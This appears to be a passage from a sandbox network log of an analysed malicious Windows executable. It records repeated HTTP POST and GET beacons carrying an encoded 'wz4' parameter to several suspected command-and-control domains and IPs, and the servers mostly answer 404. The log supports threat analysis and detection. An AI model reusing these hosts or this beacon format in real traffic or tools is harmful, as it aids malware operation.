                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.4575703.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:38.397027016 CET10817OUTPOST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 59 65 6b 45 66 5a 74 72 49 61 58 59 74 63 49 58 35 66 72 4b 33 5a 76 77 52 31 39 7a 44 45 5a 7a 6b 48 4e 68 66 42 6f 79 4f 65 52 53 35 43 77 70 38 59 6c 46 4a 2b 6c 6c 72 67 38 73 45 75 2f 6f 43 7a 72 68 51 36 6e 6e 69 49 31 58 35 42 4f 75 37 74 31 69 44 4c 66 70 65 2b 63 75 49 6e 76 31 50 68 50 39 64 58 67 42 4e 4d 36 4b 65 69 74 57 79 50 56 6e 74 70 31 66 79 54 42 61 65 6e 63 4d 37 71 38 70 6a 42 61 4a 69 51 4a 48 4e 39 38 48 39 78 64 58 6b 44 4c 4e 36 63 2f 79 70 46 6f 2b 69 4c 32 33 61 70 4d 74 51 4b 5a 72 6e 2f 7a 66 6e 43 79 56 4e 71 54 2b 46 30 71 38 66 76 59 76 36 4c 50 32 30 6a 54 33 75 2f 53 61 52 7a 45 63 6c 34 45 67 35 4f 7a 39 61 41 55 75 39 62 64 74 76 65 57 48 5a 64 66 6b 44 71 54 55 35 5a 6e 79 52 75 37 41 50 50 47 77 62 4a 4f 41 59 7a 46 79 5a 69 59 47 75 7a 49 55 51 63 56 6a 58 6f 49 4f 6a 62 4d 45 2f 59 59 76 77 75 63 4e 77 48 6a 63 6c 6c 71 71 68 4f 6b 63 39 6a 4d 31 58 7a 37 39 34 66 55 48 30 59 65 34 42 79 45 36 6e 2f 35 38 6f 2b 69 4f 47 46 6d 39 39 59 5a 38 63 6f [TRUNCATED]
                                                                              Data Ascii: wz4=YekEfZtrIaXYtcIX5frK3ZvwR19zDEZzkHNhfBoyOeRS5Cwp8YlFJ+llrg8sEu/oCzrhQ6nniI1X5BOu7t1iDLfpe+cuInv1PhP9dXgBNM6KeitWyPVntp1fyTBaencM7q8pjBaJiQJHN98H9xdXkDLN6c/ypFo+iL23apMtQKZrn/zfnCyVNqT+F0q8fvYv6LP20jT3u/SaRzEcl4Eg5Oz9aAUu9bdtveWHZdfkDqTU5ZnyRu7APPGwbJOAYzFyZiYGuzIUQcVjXoIOjbME/YYvwucNwHjcllqqhOkc9jM1Xz794fUH0Ye4ByE6n/58o+iOGFm99YZ8covyD28Q0szmpfMffNqQ/ly0bXaPVuAFHPeC3c54KF1QjXIOipXiTosDncPtBK7RQT+fL2eKGLN87SDUA10Q+X5QzVa7PF5I2VK2/3uvfHdZZmclgh2aiAsUzI7GPpjH7jqWu5AGOw2MbsWxjesr/r6O2jrWBPZNLS02YPlO8vRc/1PHf4t/GmsFG61132JYRs8i70pL7UjCbrDBr1GQ8R5poUkywMU7txZ85eK95wfFBKp5e6QiIccoA3dTEhqxhnwoZbt/LF4Q87TtjkM/GjO188aceaDneAisMAxESTiPlxPV0gUj5X2ATViqw/ZNpv5JjZSMuRrtr3ZAGwQNsd8K4qvmRcFA5Gut+pCmvT6QzyEE9P+d+4ZYbfP+I2JR6ajQYzy6o3enM5QUElyQHdpFSpPVTnEzslxz0IBGFdFIpJvkedfcDJXw3u1vRuTMnRPlYti9ReYoTWD+03sw0yD1wnRveWgndOExatplnHhUL8+G8EorLM7EgJcDDHqmYCHNAnQRBeqh0mU0VhN6YulN54gfW0NQdZ29qEXwvrC/848jw6234nFWZ1Q4Kln87klGWDE8lE4MqaGjaRHSjLwxkXn5EHYwJx9yVtUmIGEKguKk4KXlhGtjbxWhVv2juhM2cn+Vbl/2Q00PlhNW5hhSufu1lxcSK1MB [TRUNCATED]
                                                                              Jan 14, 2025 10:25:38.842823982 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.4575833.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:40.938628912 CET444OUTGET /qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:25:41.405595064 CET379INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:25:41 GMT
                                                                              content-length: 258
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 7a 34 3d 56 63 4d 6b 63 75 49 52 63 65 71 38 31 2b 67 39 79 4f 43 76 30 73 62 6c 64 30 6f 6c 44 48 6b 52 76 6c 4e 68 59 68 39 35 4e 4f 70 6e 77 6a 63 43 2f 72 31 44 46 50 46 44 68 41 51 2f 42 5a 53 70 4e 41 44 35 46 62 76 30 34 70 78 72 36 6d 32 68 39 50 4d 55 48 71 2b 39 48 2b 31 48 54 30 7a 75 51 68 66 55 53 47 56 42 51 65 57 52 66 51 56 41 38 66 64 6c 79 49 55 3d 26 4f 76 56 3d 32 6e 6a 44 36 66 38 30 45 44 4f 4c 51 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.45760038.47.233.52804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:54.877959967 CET691OUTPOST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 66 4b 52 35 42 69 52 5a 41 2b 48 47 77 55 70 31 56 69 32 2b 67 64 4d 49 66 5a 64 2b 61 37 66 36 6f 5a 79 75 68 4d 79 73 51 52 31 6f 74 68 66 32 43 33 74 56 67 52 63 31 5a 50 34 39 34 47 78 72 4f 42 38 75 4b 4f 69 55 47 31 6f 64 42 47 66 44 4e 70 31 6d 34 58 4a 50 73 44 50 50 69 37 2b 31 65 50 33 4a 4e 52 67 57 64 41 73 30 32 34 7a 75 64 37 6e 66 48 49 39 48 73 6d 30 69 46 77 52 33 74 43 56 39 6c 58 39 6d 44 2b 4f 32 2b 68 6b 62 5a 32 6b 34 70 6e 6d 64 7a 5a 6c 50 36 4d 6a 35 6e 31 6b 63 78 54 45 47 41 78 4c 50 58 51 5a 4f 69 65 6d 33 6f 6a 6c 62 54 7a 5a 72 4f 32 31 30 34 67 3d 3d
                                                                              Data Ascii: wz4=fKR5BiRZA+HGwUp1Vi2+gdMIfZd+a7f6oZyuhMysQR1othf2C3tVgRc1ZP494GxrOB8uKOiUG1odBGfDNp1m4XJPsDPPi7+1eP3JNRgWdAs024zud7nfHI9Hsm0iFwR3tCV9lX9mD+O2+hkbZ2k4pnmdzZlP6Mj5n1kcxTEGAxLPXQZOiem3ojlbTzZrO2104g==
                                                                              Jan 14, 2025 10:25:55.782677889 CET289INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:25:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.45760138.47.233.52804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:57.420248985 CET711OUTPOST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 66 4b 52 35 42 69 52 5a 41 2b 48 47 69 45 5a 31 51 44 32 2b 33 74 4d 48 44 70 64 2b 44 4c 66 32 6f 5a 75 75 68 4e 48 68 51 69 64 6f 74 42 76 32 46 31 46 56 6c 52 63 31 57 66 34 43 33 6d 78 65 4f 42 42 45 4b 4d 32 55 47 78 41 64 42 47 76 44 4d 65 42 68 35 48 4a 4e 33 54 50 4e 38 4c 2b 31 65 50 33 4a 4e 52 30 38 64 41 30 30 32 70 44 75 63 5a 50 59 45 49 39 41 36 32 30 69 42 77 52 7a 74 43 55 65 6c 57 52 63 44 39 32 32 2b 6a 38 62 5a 6e 6b 37 6e 6e 6d 68 33 5a 6b 2b 2b 2b 71 46 71 47 68 6b 2b 56 4e 68 48 44 62 43 62 32 55 55 7a 76 48 67 36 6a 42 6f 4f 30 51 66 44 31 49 39 6a 70 50 6a 6d 4a 64 66 47 4b 41 32 2b 44 59 4c 73 66 57 59 4f 6c 67 3d
                                                                              Data Ascii: wz4=fKR5BiRZA+HGiEZ1QD2+3tMHDpd+DLf2oZuuhNHhQidotBv2F1FVlRc1Wf4C3mxeOBBEKM2UGxAdBGvDMeBh5HJN3TPN8L+1eP3JNR08dA002pDucZPYEI9A620iBwRztCUelWRcD922+j8bZnk7nnmh3Zk+++qFqGhk+VNhHDbCb2UUzvHg6jBoO0QfD1I9jpPjmJdfGKA2+DYLsfWYOlg=
                                                                              Jan 14, 2025 10:25:58.318330050 CET289INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:25:58 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.45760238.47.233.52804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:59.969480991 CET10793OUTPOST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 66 4b 52 35 42 69 52 5a 41 2b 48 47 69 45 5a 31 51 44 32 2b 33 74 4d 48 44 70 64 2b 44 4c 66 32 6f 5a 75 75 68 4e 48 68 51 69 46 6f 74 79 58 32 44 55 46 56 69 52 63 31 51 76 34 35 33 6d 78 48 4f 42 70 41 4b 4d 71 71 47 33 45 64 41 6c 6e 44 46 4d 70 68 67 58 4a 4e 6f 44 50 49 69 37 2b 67 65 4d 66 4e 4e 52 6b 38 64 41 30 30 32 72 62 75 56 72 6e 59 49 6f 39 48 73 6d 30 32 46 77 52 62 74 43 74 6c 6c 57 56 32 44 73 57 32 2b 41 45 62 56 78 77 37 34 33 6d 5a 77 5a 6b 6d 2b 2b 32 67 71 46 45 64 2b 56 51 47 48 42 48 43 4b 53 78 67 30 64 62 48 6a 6c 46 37 4f 6e 67 4a 4b 47 55 67 72 6f 48 47 6d 4c 64 4c 57 62 52 63 36 42 55 42 2b 76 53 6f 56 67 39 66 67 6f 6c 52 53 56 2b 77 53 33 64 45 6d 4e 70 36 6e 4d 70 58 6a 75 70 36 6f 45 43 41 74 64 6b 73 55 4c 50 37 66 52 4f 76 39 78 2f 58 66 71 42 46 4a 39 67 65 75 45 6b 31 50 53 6a 4c 76 53 64 57 70 35 74 43 2f 4e 35 6d 38 45 47 44 69 4e 2b 75 57 50 5a 4a 4f 6d 6b 41 46 69 6d 4e 72 30 4e 7a 74 69 47 31 4e 59 74 34 69 68 74 4b 4f 63 56 4e 47 4d 2b 42 75 34 [TRUNCATED]
                                                                              Data Ascii: wz4=fKR5BiRZA+HGiEZ1QD2+3tMHDpd+DLf2oZuuhNHhQiFotyX2DUFViRc1Qv453mxHOBpAKMqqG3EdAlnDFMphgXJNoDPIi7+geMfNNRk8dA002rbuVrnYIo9Hsm02FwRbtCtllWV2DsW2+AEbVxw743mZwZkm++2gqFEd+VQGHBHCKSxg0dbHjlF7OngJKGUgroHGmLdLWbRc6BUB+vSoVg9fgolRSV+wS3dEmNp6nMpXjup6oECAtdksULP7fROv9x/XfqBFJ9geuEk1PSjLvSdWp5tC/N5m8EGDiN+uWPZJOmkAFimNr0NztiG1NYt4ihtKOcVNGM+Bu4XyTrvDz2OpRIq5krOVYJ3Qs8qcZgKiHXzy2V3tx164RGxsPbfAIcgSW7ngony12ft5Lrrs0YC/whTaKCtZrTlI/WyMbcxULvbfw2bRx/JxR0pn4gREbK5vc5NF6gC38pZSJPKGBPgQ3qTTM1cN7naSUVrfjDQ5BOktL7d3njwiLqeMQ5Gw+0vtlpub4UMoZ6L/jvblC2VZZUKbAfzqa/4QiULHUL22n6Twnna+0hRi0SxlIJ3d9LtHsR5erDMUVWoV3ZnLOv+XQiJxbfHR9J3CBEREgmoDV1zeDw7c7QDzZN5YgS+c7JCfXZWRHhA9ndiPIy0JUwJpFmlYvw6NXAX/MGEezh61DhGDQatREeF4FDgqhpgiSADcqviLTIA/WMMlaOw9gl8pPH+D8xfBSn6POlYCOVMuTdH5GupzJLRSXEqMki/Oky81/Usxwah2nv4ZbuJmiPCiFrBfH9/THkOFaE5+rayGLVCC/BOCvO4PZkMEIpjCunViFEZAVPvyr3q/b39SvQgPhJjGzuvfu/KN3yOEthDM9NPQwE0ktfkgQvzRuRkAgO5GmhAXgdFXnSQHBJcAFA4AyAUNnPqC7HLKse3pw8hZFRgxV3QVsL3jhnS0c2zNF3liAjUDxXYlJ46sT36LX7gb/tLTL66Jyw8QBApiKn9b9pq2 [TRUNCATED]
                                                                              Jan 14, 2025 10:26:00.889535904 CET289INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:26:00 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.45760338.47.233.52804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:02.518615007 CET436OUTGET /dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:03.413165092 CET289INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:26:03 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.457604104.21.3.193804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:08.452037096 CET727OUTPOST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 30 2b 54 6c 2f 61 73 4e 30 73 67 77 4a 75 48 58 67 38 41 38 56 66 6a 76 46 71 47 30 73 38 39 62 4c 6d 34 48 76 41 6d 2b 2b 45 54 73 58 6e 72 70 69 38 74 47 62 62 43 67 6a 63 74 2b 71 76 55 6a 48 58 37 33 57 74 51 34 43 37 44 47 35 32 41 45 6b 73 33 75 73 6a 52 7a 7a 63 30 41 41 31 77 78 57 69 6f 44 58 79 6e 38 47 56 4c 76 71 6a 71 43 78 31 45 74 43 36 50 39 39 71 42 48 6b 52 2b 56 49 76 51 77 43 2b 33 4b 6d 57 30 7a 4b 63 78 77 54 4f 77 47 2f 79 4a 35 48 4b 68 36 30 35 37 70 4f 36 45 52 59 2f 6f 41 4a 48 58 38 75 36 48 51 47 64 39 4d 32 72 4f 65 35 61 41 4a 57 65 62 47 4e 41 3d 3d
                                                                              Data Ascii: wz4=0+Tl/asN0sgwJuHXg8A8VfjvFqG0s89bLm4HvAm++ETsXnrpi8tGbbCgjct+qvUjHX73WtQ4C7DG52AEks3usjRzzc0AA1wxWioDXyn8GVLvqjqCx1EtC6P99qBHkR+VIvQwC+3KmW0zKcxwTOwG/yJ5HKh6057pO6ERY/oAJHX8u6HQGd9M2rOe5aAJWebGNA==
                                                                              Jan 14, 2025 10:26:08.909774065 CET922INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:08 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pt32mz4Hjf5wEYEo84%2FdHhvMrBqOd9qGOnyw2tkOof0KdwmNOSE8nVKByZycViJhT%2F82LZwvB6SZcNzltYxE6tBD0Icnv1pfWwHcmjNspDZy4qrksAN6UH9zvhU%2BsLUlWyoafdocWILSdJf"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c953158fa4309-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.457605104.21.3.193804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:26:11.011548042 CET747OUTPOST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 30 2b 54 6c 2f 61 73 4e 30 73 67 77 50 4f 58 58 7a 4e 41 38 45 76 6a 6f 63 4b 47 30 35 4d 39 41 4c 6e 45 48 76 42 6a 6c 2b 32 48 73 58 43 76 70 6a 39 74 47 59 62 43 67 70 38 74 78 6b 50 56 68 48 58 32 43 57 74 63 34 43 37 58 47 35 32 77 45 6e 62 4c 70 74 7a 51 56 2b 38 30 65 4f 56 77 78 57 69 6f 44 58 79 44 46 47 56 54 76 71 7a 61 43 77 51 6f 75 42 36 50 2b 36 71 42 48 31 42 2f 63 49 76 51 53 43 38 44 67 6d 54 34 7a 4b 59 39 77 54 66 77 48 32 79 4a 7a 5a 36 67 6b 79 36 57 2f 4d 62 70 72 47 38 63 7a 48 56 37 5a 76 38 4b 4b 58 73 63 62 6b 72 71 74 6b 64 4a 39 62 64 6d 50 57 4f 4b 6e 67 6d 54 63 34 6a 65 31 71 4f 31 65 42 37 37 4d 4e 4f 45 3d
                                                                              Data Ascii: wz4=0+Tl/asN0sgwPOXXzNA8EvjocKG05M9ALnEHvBjl+2HsXCvpj9tGYbCgp8txkPVhHX2CWtc4C7XG52wEnbLptzQV+80eOVwxWioDXyDFGVTvqzaCwQouB6P+6qBH1B/cIvQSC8DgmT4zKY9wTfwH2yJzZ6gky6W/MbprG8czHV7Zv8KKXscbkrqtkdJ9bdmPWOKngmTc4je1qO1eB77MNOE=
                                                                              Jan 14, 2025 10:26:12.081835032 CET924INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:11 GMT
